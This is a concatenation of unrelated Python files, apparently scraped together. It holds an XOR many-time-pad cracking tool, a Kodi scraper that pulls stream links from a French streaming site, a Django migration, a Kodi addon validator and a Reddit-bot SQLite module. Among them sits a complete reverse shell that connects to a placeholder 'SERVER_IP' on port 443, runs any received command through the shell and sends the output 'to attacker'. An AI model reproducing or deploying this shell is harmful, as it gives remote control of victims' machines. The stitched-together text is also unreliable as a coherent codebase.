return "".join([chr(ord(x) ^ ord(y)) for (x, y) in zip(a[:len(b)], b)])
else:
return "".join([chr(ord(x) ^ ord(y)) for (x, y) in zip(a, b[:len(a)])])
def clean(self, ascii):
if self.isPrintable(ascii):
return ascii
return '~'
def showColumn(self):
print self.column
keyHex = self.keys[self.column]
keyAscii = keyHex.decode('hex')
for message in self.messages:
cipherHex = message[self.column * 2 :(self.column * 2) + 2]
cipherAscii = cipherHex.decode('hex')
clearAscii = self.strxor(cipherAscii,keyAscii)
cipherAscii = self.clean(cipherAscii)
clearHex = clearAscii.encode('hex')
clearAscii = self.clean(clearAscii)
print format("cipher %s (%s) -> %s -> %s (%s)" %(cipherHex,cipherAscii,keyHex, clearHex, clearAscii))
def fixCols(self,cols):
if cols == 0 or cols == '':
cols = self.maxCols
return int(cols)
def showRuler(self, cols=0):
cols = self.fixCols(cols)
for i in range(0,1 + (cols-1)/10):
sys.stdout.write(format("%3d " % (i*10)))
print
for i in range(0,1 + cols-1):
sys.stdout.write(format("%d" % (i%10)))
print
def showHexRuler(self, cols=0):
cols = self.fixCols(cols)
for i in range(0,1 + (cols-1)/10):
sys.stdout.write(format("%3d " % (i*10)))
print
for i in range(0,1 + cols-1):
sys.stdout.write(format("%d " % (i%10)))
print
def showKeys(self,cols=0):
cols = self.fixCols(cols)
self.showHexRuler(cols)
for i in range(0,cols-1):
print format("col %d" % i)
print format("set %s" % self.keys[i] )
def showKnownKeys(self, cols=0):
cols = self.fixCols(cols)
for i in range(0,cols-1):
if self.keys[i] == '00':
sys.stdout.write('.')
else:
sys.stdout.write(' ')
print
def showRange(self, cols=0):
cols = self.fixCols(cols)
self.showRuler(cols)
self.showKnownKeys(cols)
for message in self.messages:
if cols > len(message):
thisCols = len(message)
else:
thisCols = cols
for idx in range(0,thisCols -1):
cipherHex = message[idx*2:(idx*2)+2]
cipherAscii = cipherHex.decode('hex')
clearAscii = self.strxor(cipherAscii,self.keys[idx].decode('hex'))
if (clearAscii < ' ' or clearAscii > 'z'):
clearAscii = '~'
sys.stdout.write(clearAscii)
print
self.showKnownKeys(cols)
self.showRuler(cols)
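# Illustrative standalone sketch (not wired into the menu above) of the same
# column-key search that discoverPrintable()/discoverLetters() perform: a key
# byte survives only if it decrypts every message's byte in this column to a
# plausible character. `column_bytes` is a list of ints, one per message.
def discover_column_key_sketch(column_bytes, is_plausible):
    candidates = []
    for key in range(256):  # try every possible key byte
        if all(is_plausible(chr(b ^ key)) for b in column_bytes):
            candidates.append(key)
    return candidates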
def main():
attacker=XorAttack()
attacker.load()
while not attacker.exit:
attacker.accept()
if __name__ == '__main__':
main()
|
import re, urllib, urlparse
from resources.lib.modules import cleantitle
from resources.lib.modules import client
class source:
def __init__(self):
self.priority = 1
self.language = ['fr']
self.domains = ['www.cinemay.com']
self.base_link = 'http://www.cinemay.com'
self.key_link = '?'
self.search_link = 's=%s'
def movie(self, imdb, title, localtitle, aliases, year):
try:
url = {'imdb': imdb, 'title': title, 'localtitle': localtitle, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
url = {'imdb': imdb, 'tvdb': tvdb, 'tvshowtitle': tvshowtitle, 'localtvshowtitle': localtvshowtitle, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if url is None: return
url = urlparse.parse_qs(url)
url = dict([(i, url[i][0]) if url[i] else (i, '') for i in url])
url['title'], url['premiered'], url['season'], url['episode'] = title, premiered, season, episode
url = urllib.urlencode(url)
return url
except:
return
def sources(self, url, hostDict, hostprDict):
try:
print '------------------------------- -------------------------------'
sources = []
print url
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
print data
title = data['title']
year = data['year'] if 'year' in data else ''  # avoid KeyError when year is absent
season = data['season'] if 'season' in data else False
episode = data['episode'] if 'episode' in data else False
localtitle = data['localtitle'] if 'localtitle' in data else False
if season and episode:
localtitle = data['localtvshowtitle'] if 'localtvshowtitle' in data else False
t = cleantitle.get(title)
tq = cleantitle.query(localtitle)
tq2 = re.sub(' ', '', cleantitle.query(localtitle).lower())
tq = re.sub(' ', '%20', tq)
y = ['%s' % str(year), '%s' % str(int(year) + 1), '%s' % str(int(year) - 1), '0']
query = 'http://www.cinemay.com'
r = client.request('http://www.cinemay.com/?s=%s' % tq)
print 'http://www.cinemay.com/?s=%s' % tq
r = client.parseDOM(r, 'div', attrs={'class': 'unfilm'})
r = [(client.parseDOM(i, 'a', ret='href'), client.parseDOM(i, 'a', ret='title')) for i in r]
r = [(i[0][0], re.sub('(film| en streaming vf| en streaming vostfr|’| )', '', i[1][0]).lower()) for i in r if len(i[0]) > 0 and len(i[1]) > 0]
r = [(i[0], i[1], re.findall('(.+?) \(*(\d{4})', i[1])) for i in r]
r = [(i[0], i[2][0][0] if len(i[2]) > 0 else i[1], i[2][0][1] if len(i[2]) > 0 else '0') for i in r]
r = [(i[0], i[1], i[2], re.findall('(.+?)\s+(?:saison|s)\s+(\d+)', i[1])) for i in r]
r = [(i[0], i[3][0][0] if len(i[3]) > 0 else i[1], i[2], i[3][0][1] if len(i[3]) > 0 else '0') for i in r]
r = [(i[0], re.sub(' \&\#[0-9]{4,6};', '', i[1]), i[2], i[3]) for i in r]
r = [i[0] for i in r if tq2 == cleantitle.get(i[1])][0]
url = re.findall('(?://.+?|)(/.+)', r)[0]
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
r = client.request('http://www.cinemay.com' + url)
print 'http://www.cinemay.com' + url
r = client.parseDOM(r, 'div', attrs={'class': 'module-actionbar'})
r = client.parseDOM(r, 'a', ret='href')
for i in r:
if i == '#':
continue
url = client.request('http://www.cinemay.com' + i)
url = client.parseDOM(url, 'div', attrs={'class': 'wbox2 video dark'})
url = client.parseDOM(url, 'iframe', ret='src')[0]
host = re.findall('([\w]+[.][\w]+)$', urlparse.urlparse(url.strip().lower()).netloc)[0]
if host not in hostDict: continue
host = client.replaceHTMLCodes(host)
host = host.encode('utf-8')
sources.append({'source': host, 'quality': 'SD', 'language': 'FR', 'url': url, 'direct': False, 'debridonly': False})
return sources
except:
return sources
def resolve(self, url):
return url
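# Usage sketch (hypothetical values): metadata travels between the steps above
# as a urlencoded query string and is rebuilt with parse_qs in sources().
#   url = source().movie('tt0133093', 'The Matrix', 'Matrix', [], '1999')
#   data = urlparse.parse_qs(url)
#   data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])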
|
import socket,subprocess
HOST = 'SERVER_IP' # The remote host
PORT = 443 # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send('[*] Connection Established!')
while 1:
# receive shell command
data = s.recv(1024)
# if its quit, then break out and close socket
if data == "quit": break
# do shell command
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# read output
stdout_value = proc.stdout.read() + proc.stderr.read()
# send output to attacker
s.send(stdout_value)
s.close()
|
from openwns.module import Module
class DLL(Module):
def __init__(self):
super(DLL, self).__init__("dll", "dllbase")
|
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('activitydb', '0015_auto_20150924_0646'),
]
operations = [
migrations.RemoveField(
model_name='projectproposal',
name='approval_submitted_by',
),
migrations.RemoveField(
model_name='projectproposal',
name='approved_by',
),
migrations.RemoveField(
model_name='projectproposal',
name='community',
),
migrations.RemoveField(
model_name='projectproposal',
name='estimated_by',
),
migrations.RemoveField(
model_name='projectproposal',
name='office',
),
migrations.RemoveField(
model_name='projectproposal',
name='program',
),
migrations.RemoveField(
model_name='projectproposal',
name='project_type',
),
migrations.RemoveField(
model_name='projectproposal',
name='sector',
),
migrations.AddField(
model_name='projectagreement',
name='exchange_rate',
field=models.CharField(help_text='Local Currency exchange rate to USD', max_length=255, null=True, blank=True),
),
migrations.AddField(
model_name='projectagreement',
name='exchange_rate_date',
field=models.DateField(help_text='Date of exchange rate', null=True, blank=True),
),
migrations.AddField(
model_name='projectagreement',
name='local_mc_estimated_budget',
field=models.CharField(help_text='Total portion of estimate for your agency', max_length=255, null=True, verbose_name='Estimated Organization Total in Local Currency', blank=True),
),
migrations.AddField(
model_name='projectagreement',
name='local_total_estimated_budget',
field=models.CharField(help_text='In Local Currency', max_length=255, null=True, verbose_name='Estimated Total in Local Currency', blank=True),
),
migrations.AlterField(
model_name='projectagreement',
name='account_code',
field=models.CharField(max_length=255, null=True, verbose_name='Account Code', blank=True),
),
migrations.AlterField(
model_name='projectagreement',
name='lin_code',
field=models.CharField(max_length=255, null=True, verbose_name='LIN Sub Code', blank=True),
),
migrations.DeleteModel(
name='ProjectProposal',
),
]
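# To apply this migration (assuming the app label used above):
#   python manage.py migrate activitydb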
|
"""
addonpr addonparser module
Copyright (C) 2012-2013 Team XBMC
http://www.xbmc.org
This Program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2, or (at your option)
any later version.
This Program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; see the file LICENSE. If not, see
<http://www.gnu.org/licenses/>.
"""
from __future__ import division
import os
import re
import logging
import xml.etree.ElementTree as ET
from xml.dom import minidom
from xml.parsers.expat import ExpatError
from datetime import datetime, timedelta
from PIL import Image
from config import BRANCHES, DEPENDENCIES, STRINGS_ID
from addonpr import command
logger = logging.getLogger(__name__)
def filter_comments(infile):
"""Generator to filter commented line in a python file"""
for line in infile:
# Remove leading and trailing characters
line = line.strip()
# Skip blank line
if line == '':
continue
if not line.startswith('#'):
yield line
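# Usage sketch:
#   with open('default.py') as f:
#       for line in filter_comments(f):
#           ...  # only stripped, non-blank, non-comment lines arrive here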
class Addon(object):
"""Class used to parse the addon.xml"""
def __init__(self, addon_path):
tree = ET.parse(os.path.join(addon_path, 'addon.xml'))
self._root = tree.getroot()
self.addon_id = self._root.get('id')
self.name = self._root.get('name')
self.version = AddonVersion(self._root.get('version'))
self.provider = self._root.get('provider-name')
self.addon_type = None
self.dependencies = []
self.extensions = []
self.metadata = {}
self._parse()
def _parse(self):
"""Parse the addon.xml"""
requires = self._root.find('requires')
# addon.xml may lack a <requires> element; guard against iterating None
self.dependencies = [elt.attrib for elt in list(requires)] if requires is not None else []
for ext in self._root.iter('extension'):
if ext.get('point') == 'xbmc.addon.metadata':
self.metadata = self._get_metadata(ext)
else:
self.extensions.append(self._get_extension(ext))
self.addon_type = self._get_addon_type()
def _get_extension(self, ext):
extension = ext.attrib
try:
extension['provides'] = ext.find('provides').text
except AttributeError:
extension['provides'] = ''
return extension
def _get_metadata(self, ext):
metadata = {}
for elt in list(ext):
tag = elt.tag
if tag in ('summary', 'description', 'disclaimer'):
if tag not in metadata:
metadata[tag] = {}
try:
metadata[tag][elt.attrib['lang']] = elt.text
except KeyError:
metadata[tag]['en'] = elt.text
else:
metadata[tag] = elt.text
return metadata
def _get_addon_type(self):
"""Return the addon type"""
for extension in self.extensions:
extension_type = extension['point']
if extension_type == 'xbmc.gui.skin':
return 'skin'
elif extension_type == 'xbmc.gui.webinterface':
return 'webinterface'
elif extension_type.startswith('xbmc.metadata.scraper'):
return 'scraper'
elif (extension_type == 'xbmc.python.pluginsource' and not
self.addon_id.startswith('script')):
return 'plugin'
else:
return 'script'
def is_broken(self):
"""Return True if the addon is broken"""
return 'broken' in self.metadata
def get_extension_points(self):
"""Return a list of extension points (excluding metadata)"""
return [extension['point'] for extension in self.extensions]
def get_extensions(self, point):
"""Return a filtered list of extensions by point-attribute"""
return [ext for ext in self.extensions if ext.get('point') == point]
def last_commit_date(self):
"""Return the last commit date"""
timestamp = command.run(
'git log -n1 --format="%ct" {}'.format(
os.path.join(self.addon_id, 'addon.xml')))
return datetime.fromtimestamp(float(timestamp))
def is_last_commit_older_than(self, days):
age = datetime.now() - self.last_commit_date()
return age > timedelta(days=days)
class AddonVersion(object):
"""Class to represent and compare addon versions"""
version_re = re.compile(r'^(\d+)\.(\d+)(?:\.(\d+))?$',
re.VERBOSE)
def __init__(self, vstring):
self._parse(vstring)
self.length = len(self.version)
def _parse(self, vstring):
match = self.version_re.match(vstring)
if not match:
raise ValueError("invalid version number '%s'" % vstring)
(major, minor, patch) = match.groups()
if patch is None:
self.version = tuple(map(int, [major, minor]))
else:
self.version = tuple(map(int, [major, minor, patch]))
def __str__(self):
return '.'.join(map(str, self.version))
def __cmp__(self, other):
if isinstance(other, basestring):
other = AddonVersion(other)
return cmp(self.version, other.version)
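# Usage sketch (Python 2 semantics, matching the __cmp__/cmp/basestring code
# above; strings are coerced to AddonVersion before the tuples are compared):
#   AddonVersion('1.2.0') > '1.1.9'  # True
#   str(AddonVersion('1.10'))        # '1.10'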
class AddonCheck(object):
"""Class to run addon tests"""
def __init__(self, addon_path, xbmc_branch, addon_id=None,
addon_version=None, parent_dir=None):
self.addon_id = addon_id
self.addon_path = self._get_addon_path(addon_path)
self.xbmc_branch = xbmc_branch
self.addon_version = addon_version
self.parent_dir = parent_dir
self.files = self._get_files()
self.addon = Addon(self.addon_path)
self.warnings = 0
self.errors = 0
def _warning(self, message, *args, **kwargs):
self.warnings += 1
logger.warning(message, *args, **kwargs)
def _error(self, message, *args, **kwargs):
self.errors += 1
logger.error(message, *args, **kwargs)
def _get_files(self):
filenames = [os.path.join(root, name)
for root, dirs, files in os.walk(self.addon_path)
for name in files]
return filenames
def _get_addon_path(self, addon_path):
if self.addon_id and os.path.isdir(os.path.join(addon_path, self.addon_id)):
addon_path = os.path.join(addon_path, self.addon_id)
logger.debug('Switched to addon subdir: %s', addon_path)
return addon_path
def _checkout_branch(self, repo):
"""Checkout the proper branch in repo"""
current_dir = os.getcwd()
try:
os.chdir(repo)
except OSError as e:
logger.error('OSError: %s', e.strerror)
return
command.run('git checkout -qf %s' % self.xbmc_branch)
os.chdir(current_dir)
def check_xbmc_version(self):
if self.xbmc_branch not in BRANCHES:
self._error('Invalid xbmc version: %s',
self.xbmc_branch)
def check_addon_version(self):
if self.xbmc_branch == 'frodo':
if self.addon.version.length != 3:
self._error('Invalid version %s for frodo. Should be x.y.z.',
self.addon.version)
def check_addon_xml(self):
if self.addon_id is not None and self.addon_id != self.addon.addon_id:
self._error("Given addon id doesn't match %s",
self.addon.addon_id)
if self.addon_version is not None and self.addon_version != self.addon.version:
self._error("Given addon version doesn't match %s",
self.addon.version)
if 'language' not in self.addon.metadata:
self._error('Missing language tag')
def check_optional_info(self):
for tag in ['license', 'forum', 'website', 'source', 'email']:
if tag not in self.addon.metadata:
self._warning('Missing optional %s tag' % tag)
def check_dependencies(self):
xbmc_dependencies = DEPENDENCIES[self.xbmc_branch]
if self.parent_dir is not None:
# Prepare the repositories for dependencies check
for repo in ['plugins', 'scripts']:
self._checkout_branch(os.path.join(self.parent_dir, repo))
for dependency in self.addon.dependencies:
dependency_id = dependency['addon']
try:
dependency_version = dependency['version']
except KeyError:
logger.debug('Skipping %s dependency (no version specified)',
dependency_id)
continue
if dependency_id in xbmc_dependencies:
if dependency_version != xbmc_dependencies[dependency_id]:
self._error('Invalid version for %s (%s != %s)',
dependency_id,
dependency_version,
xbmc_dependencies[dependency_id])
else:
logger.debug('%s dependency OK (%s)',
dependency_id,
dependency_version)
elif self.parent_dir is not None:
# Try to check plugins and scripts dependencies
for repo in ['plugins', 'scripts']:
dependency_dir = os.path.join(self.parent_dir, repo, dependency_id)
if os.path.isdir(dependency_dir):
dependency_addon = Addon(dependency_dir)
if dependency_version > dependency_addon.version:
self._error('Invalid version for %s (%s > %s)',
dependency_id,
dependency_version,
dependency_addon.version)
else:
logger.debug('%s dependency OK (%s <= %s)',
dependency_id,
dependency_version,
dependency_addon.version)
break
else:
logger.debug('Skipping dependency %s (not found in plugins or scripts)',
dependency_id)
else:
logger.debug('Skipping dependency %s (no parent_dir given)',
dependency_id)
def check_addon_structure(self):
for mandatory in ('addon.xml', 'LICENSE.txt'):
if not os.path.isfile(os.path.join(self.addon_path, mandatory)):
self._error('Missing %s file', mandatory)
for recommended in ('changelog.txt',):
if not os.path.isfile(os.path.join(self.addon_path, recommended)):
self._warning('Missing recommended %s file', recommended)
def check_forbidden_files(self):
for filename in self.files:
if filename.endswith(('.so', '.dll', '.pyo', '.pyc',
'.exe', '.xbt', '.xpr', 'Thumbs.db', '.DS_Store')):
self._error('%s is not allowed', filename)
def _get_image_size(self, picture):
try:
img = Image.open(os.path.join(self.addon_path, picture))
except IOError:
logger.debug("Picture %s doesn't exist" % picture)
return (0, 0)
return img.size
def check_images(self):
# modules are not visible and don't require any images
if 'xbmc.python.module' in self.addon.get_extension_points():
logger.debug('No check done on images for %s' % self.addon.addon_id)
else:
width, height = self._get_image_size('icon.png')
if (width, height) != (256, 256):
self._error('Incorrect icon.png size: %dx%d', width, height)
width, height = self._get_image_size('fanart.jpg')
#if (width, height) != (0, 0) and width / height != 16 / 9:
if (width, height) != (0, 0) and not (width, height) in ((1280, 720),
(1920, 1080)):
self._error('Incorrect fanart.jpg aspect ratio: %dx%d', width, height)
def check_forbidden_patterns(self):
for filename in self.files:
if filename.endswith('.py'):
logger.debug('Checking %s' % filename)
with open(filename, 'rb') as f:
for line in filter_comments(f):
if 'os.getcwd' in line:
self._warning('%s: os.getcwd() is deprecated', filename)
if 'PLAYER_CORE' in line:
self._warning('{}: setting PLAYER_CORE_* is deprecated'.format(filename))
if 'executehttpapi' in line:
self._warning('{}: executehttpapi is deprecated'.format(filename))
def get_po_strings_id(self, filename):
"""Generator that returns all strings id from a po file"""
with open(filename, 'r') as f:
for line in f:
line = line.strip()
if line.startswith("msgctxt"):
# msgctxt "#30301"
try:
yield int(line.split()[1][2:-1])
except ValueError:
self._warning('{}: has non-integer string ID: {}'.format(filename, line))
def get_xml_strings_id(self, filename):
"""Generator that returns all strings id from a xml file"""
try:
tree = ET.parse(filename)
except ET.ParseError as e:
self._error('Parse error in {}: {}'.format(filename, e))
return  # ends the generator; raising StopIteration here is deprecated (PEP 479)
for elt in tree.getroot():
yield int(elt.get('id'))
def get_strings_id(self, filename):
"""Generator that returns all strings id from file"""
file_type = filename.split('.')[-1]
try:
return getattr(self, 'get_{}_strings_id'.format(file_type))(filename)
except AttributeError:
logger.warning('Unknown strings file type: {}'.format(file_type))
return []
@staticmethod
def is_valid_string_id(string_id, addon_type='all'):
try:
min_id, max_id = STRINGS_ID[addon_type]
except KeyError:
min_id, max_id = STRINGS_ID['all']
return min_id <= string_id <= max_id
def check_strings_id(self):
for filename in self.files:
if filename.endswith(('strings.xml', 'strings.po')):
logger.debug('Checking %s' % filename)
for string_id in self.get_strings_id(filename):
if not self.is_valid_string_id(string_id, 'all'):
self._error('Invalid string id {}'.format(string_id))
elif not self.is_valid_string_id(string_id, self.addon.addon_type):
self._warning('Invalid string id {} for {}'.format(
string_id, self.addon.addon_type))
def check_xml_encoding(self):
for filename in self.files:
if filename.endswith('.xml'):
try:
dom = minidom.parse(filename)
except ExpatError as e:
self._error('{}: {}'.format(filename, e))
else:
if not dom.encoding:
self._error('No xml encoding specified in {}'.format(filename))
else:
logger.debug('{} encoding: {}'.format(filename, dom.encoding))
def check_print_statements(self):
print_re = re.compile('print[ \(]')
for filename in self.files:
if filename.endswith('.py'):
if 'test' in filename:
logger.debug('Skipping %s for print-check' % filename)
continue
logger.debug('Checking %s' % filename)
with open(filename, 'rb') as f:
for line in filter_comments(f):
if print_re.search(line):
self._warning('%s: print statement should be replaced with xbmc.log()', filename)
logger.debug(line)
# We need only one warning per file, so exit the
# loop
break
def check_language_dirs(self):
language_dir = os.path.join(self.addon_path, 'resources', 'language')
if not os.path.exists(language_dir):
return
for dirname in os.listdir(language_dir):
logger.debug('Checking language dir {}'.format(dirname))
# The language dir can be made of several words:
# Chinese (Traditional)
# Checking only the first word should be good enough
first_word = dirname.split()[0]
if first_word != first_word.capitalize():
self._warning('Language dir {} should be capitalized'.format(
dirname))
def check_extension_point(self):
if 'xbmc.addon.repository' in self.addon.get_extension_points():
self._error('xbmc.addon.repository extension point is not allowed')
for extension in self.addon.get_extensions('xbmc.service'):
if 'start' in extension and extension['start'] not in ('startup', 'login'):
self._error(('Wrong start-attribute for service extension. '
'It needs to be either "startup" or "login"'))
def run(self):
"""Run all the check methods and return the numbers of warnings and errors"""
logger.info('Checking %s', self.addon_path)
for attribute in dir(self):
if attribute.startswith('check_'):
logger.debug('Running %s' % attribute)
getattr(self, attribute)()
logger.info('%d warning(s) and %d error(s) found', self.warnings,
self.errors)
return (self.warnings, self.errors)
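# Hypothetical driver sketch (arguments as in AddonCheck.__init__ above);
# run() discovers and invokes every check_* method via dir(self):
#   check = AddonCheck('plugin.video.example', 'frodo')
#   warnings, errors = check.run()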
|
import logging
import sqlite3
from pkg_resources import resource_filename
import time
import atexit
class Database:
"""
This object provides a full set of features to interface with a basic session database,
which includes the following tables:
- **storage**: saves the state of the bot and helps against double posting
- **update_threads**: storage to store thing_ids which have to be updated by your plugin
- **modules**: persistent module storage
- **userbans**: a table to ban users from being able to trigger certain plugins
- **subbans**: a table to ban subreddits from being able to trigger certain plugins
:ivar logger: A database-specific logger. Currently missing debug messages for some database actions.
:type logger: logging.Logger
:vartype logger: logging.Logger
:ivar db: A connection to the SQLite database: ``/config/storage.db``
:type db: sqlite3.Connection
:vartype db: sqlite3.Connection
:ivar cur: Cursor to interface with the database.
:type cur: sqlite3.Cursor
:vartype cur: sqlite3.Cursor
:ivar _meta_push: Dictionary of cached counters used to reduce the number of requests to the meta tables
:type _meta_push: dict
:vartype _meta_push: dict
:ivar _MAX_CACHE: Maximum summed count within the _meta_push dictionary before it gets pushed into the database.
:type _MAX_CACHE: int
:vartype _MAX_CACHE: int
"""
def __init__(self):
self.logger = logging.getLogger("database")
self.db = sqlite3.connect(
resource_filename("config", "storage.db"),
check_same_thread=False,
isolation_level=None
)
self.cur = self.db.cursor()
self.database_init()
self._meta_push = {'submissions': 0, 'comments': 0, 'cycles': 0}
self._MAX_CACHE = 500
self._date = time.time() // (60 * 60)
atexit.register(self.write_out_meta_push, force=True) # When the database gets closed, write out the meta
# atexit.register(self.db.close)
atexit.register(self.logger.warning, "DB connection has been closed.")
def database_init(self):
"""
Initializes the database: checks manually (because: why not?) whether the tables already exist and, if not,
creates the necessary tables. You can modify the PRAGMA or add tables however you please, as long as you keep
the order of these tables (and their columns) intact. Some SQL statements are deliberately not fully explicit
so that they stay independent of column order.
"""
info = lambda x: self.logger.info("Table '{}' had to be generated.".format(x))
if not self._database_check_if_exists('storage'):
self.cur.execute(
'CREATE TABLE IF NOT EXISTS storage (thing_id STR(15), bot_module INT(5), timestamp datetime)'
)
info('storage')
if not self._database_check_if_exists('update_threads'):
self.cur.execute(
'CREATE TABLE IF NOT EXISTS update_threads '
'(thing_id STR(15) NOT NULL, bot_module INT(5), created DATETIME, '
'lifetime DATETIME, last_updated DATETIME, interval INT(5))'
)
info('update_threads')
if not self._database_check_if_exists('modules'):
self.cur.execute(
'CREATE TABLE IF NOT EXISTS modules '
'(module_name STR(50))'
)
info('modules')
if not self._database_check_if_exists('userbans'):
self.cur.execute(
'CREATE TABLE IF NOT EXISTS userbans (username STR(50) NOT NULL, bot_module INT(5))'
)
info('userbans')
if not self._database_check_if_exists('subbans'):
self.cur.execute(
'CREATE TABLE IF NOT EXISTS subbans (subreddit STR(50) NOT NULL, bot_module INT(5))'
)
info('subbans')
if not self._database_check_if_exists('stats'):
self.cur.execute(
'CREATE TABLE IF NOT EXISTS stats '
'(id STR(10) NOT NULL, bot_module INT(5),'
' created DATETIME, title STR(300), username STR(50), '
' permalink STR(150), subreddit STR(50), upvotes_author INT(5), upvotes_bot INT(5))'
)
info('stats')
if not self._database_check_if_exists('messages'):
self.cur.execute(
'''CREATE TABLE IF NOT EXISTS messages
(id STR(10) NOT NULL, bot_module INT(5), created DATETIME, title STR(300),
author STR(50), body STR)'''
)
info('messages')
if not self._database_check_if_exists('meta_stats'):
self.cur.execute(
'''CREATE TABLE IF NOT EXISTS meta_stats
(day DATE NOT NULL,
seen_submissions INT(10) DEFAULT 0,
seen_comments INT(10) DEFAULT 0,
update_cycles INT(10) DEFAULT 0)
''')
info('meta_stats')
def _database_check_if_exists(self, table_name):
"""
Helper method to check if a certain table (by name) exists. Refrain from using it if you're not adding new
tables.
:param table_name: Name of the table you want to check if it exists.
:type table_name: str
:return: Tuple of the table name, empty if it doesn't exist.
"""
self.cur.execute('SELECT name FROM sqlite_master WHERE type="table" AND name=(?)', (table_name,))
return self.cur.fetchone()
def insert_into_storage(self, thing_id, module):
"""
Stores a certain thing (id of comment or submission) into the storage, which is for the session consistency.
:param thing_id: Unique thing_id from a comment or submission.
:type thing_id: str
:param module: A string naming your plugin.
:type module: str
"""
self.cur.execute('INSERT INTO storage VALUES ((?), (SELECT _ROWID_ FROM modules WHERE module_name=(?)), '
'CURRENT_TIMESTAMP)', (thing_id, module))
self.logger.debug('{} from {} inserted into storage.'.format(thing_id, module))
def get_all_storage(self):
"""
Returns all elements inside the bot storage.
:return: Tuple with tuples with all storage elements with ``(thing_id, module_name, timestamp)``
"""
self.cur.execute("""SELECT thing_id, module_name, timestamp FROM storage
INNER JOIN modules
ON storage.bot_module = modules._ROWID_""")
return self.cur.fetchall()
def retrieve_thing(self, thing_id, module):
"""
Returns a single thing from the storage by thing_id and module name. Mainly used to check if a plugin already
answered on a post.
:param thing_id: Unique thing_id from a comment or submission.
:type thing_id: str
:param module: A string naming your plugin.
:type module: str
:return: Tuple with ``(thing_id, bot_module, timestamp)``
"""
self._error_if_not_exists(module)
self.cur.execute("""SELECT thing_id, bot_module, timestamp FROM storage
WHERE thing_id = (?)
AND bot_module = (SELECT _ROWID_ FROM modules WHERE module_name=(?))
LIMIT 1""",
(thing_id, module,))
return self.cur.fetchone()
def delete_from_storage(self, min_timestamp):
"""
Deletes **all** items which are older than the given timestamp.
:param min_timestamp: Unix timestamp where all entries in storage get deleted if they're older than that.
:type min_timestamp: int | float
"""
self.cur.execute("DELETE FROM storage WHERE timestamp <= datetime((?), 'unixepoch')", (min_timestamp,))
self.logger.debug('Deleted everything from storage older than {}'.format(min_timestamp))
def select_from_storage(self, older_than_timestamp):
"""
Selects and retrieves all elements in the storage which are older than this timestamp.
:param older_than_timestamp: Unix timestamp of which time everything has to be selected before.
:type older_than_timestamp: int | float
:return: Tuples of ``(thing_id, bot_module, timestamp)``
"""
self.cur.execute("SELECT * FROM storage WHERE timestamp <= datetime((?), 'unixepoch')", (older_than_timestamp,))
return self.cur.fetchall()
def insert_into_update(self, thing_id, module, lifetime, interval):
"""
Inserts a thing_id (from a comment or submission) into the update-table, which later gets retrieved from the
update-thread and fired onto the plugin.
:param thing_id: Unique thing_id from a comment or submission.
:type thing_id: str
:param module: A string naming your plugin.
:type module: str
:param lifetime: Number of seconds from now until this item expires (bound into datetime('now', '+N seconds')).
:type lifetime: float | int
:param interval: Interval of how often you'd want this to update in seconds.
:type interval: int
"""
self._error_if_not_exists(module)
self.cur.execute("""
INSERT INTO update_threads (thing_id, bot_module, created, lifetime, last_updated, interval)
VALUES (
(?),
(SELECT _ROWID_ FROM modules WHERE module_name=(?)),
CURRENT_TIMESTAMP,
datetime('now', '+' || (?) || ' seconds'),
CURRENT_TIMESTAMP,
(?))
""",
(thing_id, module, lifetime, interval,))
self.logger.debug('Inserted {} from {} to update - lifetime: {} | interval: {}'.format(thing_id, module,
lifetime, interval))
def get_all_update(self):
"""
Returns all elements inside the update_threads table.
:return: Tuple with tuples of ``(thing_id, module_name, created, lifetime, last_updated, interval)``
"""
self.cur.execute("""SELECT thing_id, module_name, created, lifetime, last_updated, interval
FROM update_threads
INNER JOIN modules
ON update_threads.bot_module = modules._ROWID_
ORDER BY last_updated ASC""")
return self.cur.fetchall()
def _select_to_update(self, module):
"""
Selector method to get the cursor selecting all outstanding threads to update for a certain module. Refrain from
using it, since it only places the cursor.
:param module: A string naming your plugin.
:type module: str
"""
self._error_if_not_exists(module)
self.cur.execute("""SELECT thing_id, module_name, created, lifetime, last_updated, interval
FROM update_threads
INNER JOIN modules
ON update_threads.bot_module = modules._ROWID_
WHERE modules.module_name = (?)
AND CURRENT_TIMESTAMP > (datetime(update_threads.last_updated,
'+' || update_threads.interval || ' seconds'))
ORDER BY last_updated ASC""",
(module,))
def get_latest_to_update(self, module):
"""
Returns a single thing_id (from comment or submission) for a single module.
:param module: A string naming your plugin.
:type module: str
:return: Tuple with tuples of ``(thing_id, module_name, created, lifetime, last_updated, interval)``
"""
self._select_to_update(module)
return self.cur.fetchone()
def get_all_to_update(self, module):
"""
Returns **all** thing_ids (from a comment or submission) for a module.
:param module: A string naming your plugin.
:type module: str
:return: Tuple with tuples of ``(thing_id, module_name, created, lifetime, last_updated, interval)``
"""
self._select_to_update(module)
return self.cur.fetchall()
def update_timestamp_in_update(self, thing_id, module):
"""
Updates the timestamp when a thing_id was updated last.
:param thing_id: Unique thing_id from a comment or submission.
:type thing_id: str
:param module: A string naming your plugin.
:type module: str
"""
self._error_if_not_exists(module)
self.cur.execute("""UPDATE update_threads
SET last_updated=CURRENT_TIMESTAMP
WHERE thing_id=(?)
AND bot_module = (SELECT _ROWID_ FROM modules WHERE module_name = (?))""",
(thing_id, module))
self.logger.debug('Updated timestamp on {} from {}'.format(thing_id, module))
def delete_from_update(self, thing_id, module):
"""
Deletes **all** thing_ids (from a comment or submission) for a module when it outlived its lifetime.
:param thing_id: Unique thing_id from a comment or submission.
:type thing_id: str
:param module: A string naming your plugin.
:type module: str
"""
